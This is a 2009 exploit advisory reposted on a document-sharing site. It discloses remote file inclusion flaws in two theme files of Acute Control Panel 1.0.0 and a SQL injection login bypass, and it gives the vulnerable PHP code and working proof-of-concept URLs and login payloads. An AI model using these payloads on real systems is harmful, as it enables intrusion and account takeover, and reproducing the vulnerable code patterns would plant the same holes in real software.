Docstoc

Acute Control Panel 1.0.0 SQLRFI Multiple Remote Vulnerabilities

Document Sample
Acute Control Panel 1.0.0 SQLRFI Multiple Remote Vulnerabilities Powered By Docstoc
					                     Acute Control Panel 1.0.0 SQLRFI Multiple Remote Vulnerabilities   Page 1/1
  1    ###############################################################
  2    [+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
  3    [+] Discovered By SirGod
  4    [+] www.mortal−team.org
  5    [+] www.h4cky0u.org
  6    ###############################################################
  7
  8    [+] Remote File Inclusion
  9
  10     Vulnerable code in container.php
  11
  12   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  13   <?php include_once($theme_directory."/sidebar.php"); ?>
  14   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  15
  16     PoC :
  17
  18      http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00
  19
  20   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  21
  22     Vulnerable code in header.php
  23
  24   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  25   <?php include_once($theme_directory."/navigation.php"); ?>
  26   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  27
  28     PoC :
  29
  30      http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00
  31
  32   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  33
  34   [+] SQL Injection (Auth Bypass)
  35
  36     Vulnerable code in login.php
  37
  38   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  39   $query = mysql_query("SELECT
  40   id,username,password,email,fullname,permissions FROM ‘users‘ WHERE
  41   username=’$username’ AND password=’$password’", $conn) or
  42   die(mysql_error());
  43   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  44
  45     PoC :
  46
  47      Username : admin ’ or ’ 1=1
  48      Password : anything or nothing
  49
  50   ################################################################
  51
  52   # milw0rm.com [2009−03−26]
SirGod                                                                                  03/26/2009